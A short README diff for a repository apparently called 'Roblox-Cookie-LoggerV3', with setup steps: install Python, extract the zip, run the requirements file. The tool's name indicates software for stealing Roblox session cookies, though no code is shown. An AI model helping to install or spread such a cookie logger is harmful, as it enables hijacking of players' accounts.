zbenntt/Roblox-Cookie-LoggerV3/README.md

 # Sorry About the Gui It looks Ugly

 # STEPS BELOW

+step 0; if you dont have python3 installed go to https://www.python.org/downloads/ and download the latest python

 Step 1; Download Zip and extract

 Step 2; Run the requirements file and wait until it finishes and installs all requirements